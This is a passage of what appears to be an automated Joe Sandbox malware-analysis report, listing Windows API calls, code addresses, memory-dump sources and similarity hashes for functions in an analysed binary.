                                                                                                • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                              • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                              • String ID: cdecl
                                                                                              • API String ID: 3850814276-3896280584
                                                                                              • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                              • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                              • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                              • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
APIs
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
• WSAGetLastError.WSOCK32(00000000), ref: 0046D439
• _memmove.LIBCMT ref: 0046D475
• inet_ntoa.WSOCK32(?), ref: 0046D481
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 2502553879-0
• Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
• Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
• Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
• Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
APIs
• SendMessageW.USER32 ref: 00448C69
• GetWindowLongW.USER32(?,000000EC), ref: 00448C91
• SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
• SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
• Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
• Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
• Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
• accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
• WSAGetLastError.WSOCK32(00000000), ref: 00458B03
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
• Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
• Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
• Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
• Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
• Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
• Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
• Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
• GetStockObject.GDI32(00000011), ref: 00430258
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
• ShowWindow.USER32(00000000,00000000), ref: 0043027D
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Window$CreateMessageObjectSendShowStock
• String ID:
• API String ID: 1358664141-0
• Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
• Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
• Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
• Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
APIs
• GetCurrentThreadId.KERNEL32 ref: 00443CA6
• MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
• CloseHandle.KERNEL32(00000000), ref: 00443CF9
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
• Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
• Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
• Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
APIs
• GetWindowRect.USER32(?,?), ref: 00430BA2
• ScreenToClient.USER32(?,?), ref: 00430BC1
• ScreenToClient.USER32(?,?), ref: 00430BE2
• InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
• Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
• Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
• Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                              APIs
                                                                                              • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                              • __wsplitpath.LIBCMT ref: 00433950
                                                                                              • __wcsicoll.LIBCMT ref: 00433974
                                                                                              • __wcsicoll.LIBCMT ref: 0043398A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                              • String ID:
                                                                                              • API String ID: 1187119602-0
                                                                                              • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                              • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                              • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                              • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1597257046-0
                                                                                              • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                              • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                              • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                              • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                              • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 237123855-0
                                                                                              • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                              • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                              • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                              • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteDestroyObject$IconWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3349847261-0
                                                                                              • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                              • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                              • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                              • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                              • String ID:
                                                                                              • API String ID: 2223660684-0
                                                                                              • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                              • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                              • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                              • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                              APIs
                                                                                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                              • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                              • EndPath.GDI32(?), ref: 00447336
                                                                                              • StrokePath.GDI32(?), ref: 00447344
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                              • String ID:
                                                                                              • API String ID: 2783949968-0
                                                                                              • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                              • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                              • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                              • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                              • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2710830443-0
                                                                                              • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                              • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                              • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                              • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                              • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                              • String ID:
                                                                                              • API String ID: 146765662-0
                                                                                              • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
